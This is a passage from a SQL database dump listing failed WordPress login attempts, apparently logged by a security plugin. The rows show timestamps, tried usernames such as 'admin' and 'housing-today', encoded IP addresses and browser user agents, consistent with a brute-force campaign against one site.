Firefox/62.0'),(826,1457,1624595376.189012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]}#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(827,1461,1624595645.953992,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��(zt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(828,1464,1624595845.357863,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(829,1466,1624595976.848376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(830,1466,1624595976.881663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(831,1468,1624596112.101418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(832,1468,1624596112.144013,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(833,1469,1624596175.861174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(834,1472,1624596386.165330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(835,1478,1624596905.476364,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(836,1478,1624596905.510352,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(837,1479,1624596953.180881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(838,1481,1624597145.301851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(839,1481,1624597145.328788,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(840,1482,1624597200.902212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(841,1482,1624597200.942199,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(842,1485,1624597385.982487,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(843,1486,1624597457.072045,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(844,1487,1624597499.825311,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(845,1487,1624597499.901146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(846,1488,1624597576.166545,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(847,1489,1624597634.669022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(848,1490,1624597698.893229,1,'loginFailInvalidUsername','wmbadmin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(849,1491,1624597782.361978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(850,1492,1624597834.620674,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(851,1494,1624597949.931712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%:0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(852,1495,1624598025.493243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z;*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(853,1503,1624598686.086930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/\\�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(854,1503,1624598686.116193,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/\\�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(855,1507,1624599076.056401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(856,1509,1624599218.135765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(857,1510,1624599270.262855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���x�K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(858,1511,1624599355.340768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'jf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(859,1512,1624599400.837792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(860,1514,1624599545.249067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(861,1515,1624599590.636126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(862,1521,1624600078.243079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���zX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(863,1530,1624600698.586575,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(864,1531,1624600720.119669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(865,1534,1624600916.120549,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��Ú�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(866,1535,1624600987.513829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(867,1536,1624601008.818083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(868,1538,1624601135.745470,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0��E1�^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(869,1539,1624601207.094654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(870,1546,1624601685.888032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(871,1547,1624601732.997442,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���A�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(872,1552,1624602125.798520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(873,1554,1624602269.178048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(874,1556,1624602499.655939,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(875,1561,1624602816.758876,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(876,1562,1624602860.538343,1,'loginFailInvalidUsername','demo_admin',0,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(877,1564,1624602985.846571,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(878,1565,1624603040.888726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(879,1565,1624603040.950496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(880,1568,1624604499.246704,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(881,1569,1624604638.211978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(882,1570,1624607128.437167,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(883,1571,1624607129.352598,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(884,1572,1624607341.711987,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(885,1573,1624607346.057649,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(886,1576,1624607767.278725,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(887,1577,1624607767.521585,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(888,1578,1624607981.004263,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(889,1579,1624607983.000243,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(890,1581,1624608159.173298,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(891,1582,1624608159.828898,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(892,1583,1624608358.650306,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(893,1584,1624608359.956355,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(894,1585,1624608537.286884,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��6��q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(895,1586,1624608538.126967,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6��q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(896,1587,1624608767.312294,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(897,1587,1624608767.323614,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(898,1588,1624608769.022717,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(899,1588,1624608769.045044,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(900,1589,1624608947.013010,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(901,1590,1624608948.338960,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(902,1591,1624610006.869534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(E��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(903,1593,1624611528.575740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3DOy','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(904,1594,1624614208.495960,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��D�$[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(905,1595,1624614208.725273,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��D�$[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(906,1596,1624614423.562979,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(907,1597,1624614424.738861,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(908,1600,1624615020.368645,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(909,1600,1624615020.387650,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(910,1601,1624615021.993864,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(911,1603,1624615147.024396,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��3OR�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(912,1604,1624615147.640697,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3OR�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(913,1605,1624615388.199190,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(914,1605,1624615388.221492,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(915,1606,1624615388.710361,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(916,1607,1624615589.158447,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����o)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(917,1608,1624615590.670169,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����o)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(918,1609,1624615659.528091,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(919,1610,1624615665.297358,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(920,1611,1624615947.313205,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(921,1612,1624615948.748503,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(922,1613,1624616079.549528,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���#m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(923,1614,1624616080.054441,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���#m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(924,1615,1624616351.458143,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���=_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(925,1615,1624616351.494524,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���=_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(926,1616,1624616353.046154,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���=_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(927,1617,1624616598.941168,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\r���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(928,1618,1624616600.281506,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(929,1619,1624617035.854481,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(930,1620,1624617036.087174,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(931,1621,1624617129.664151,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(932,1622,1624617131.240995,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(933,1625,1624617620.997897,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(934,1626,1624617621.214887,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(935,1627,1624617858.141585,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(936,1628,1624617858.849683,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(937,1629,1624617989.108366,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(938,1630,1624617995.071020,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(939,1631,1624618278.612853,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(940,1632,1624618278.932036,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(941,1633,1624618493.734030,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(942,1634,1624618494.483344,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(943,1636,1624618679.197455,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��(zt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(944,1637,1624618680.060302,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��(zt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(945,1638,1624618892.766773,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(946,1639,1624618893.534667,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(947,1640,1624619130.297512,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(948,1641,1624619131.915017,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(949,1642,1624619639.758648,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(950,1643,1624619647.123993,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(951,1644,1624620009.194848,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\r�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(952,1645,1624620010.127593,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(953,1646,1624620198.776377,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\r�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(954,1647,1624620199.700919,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 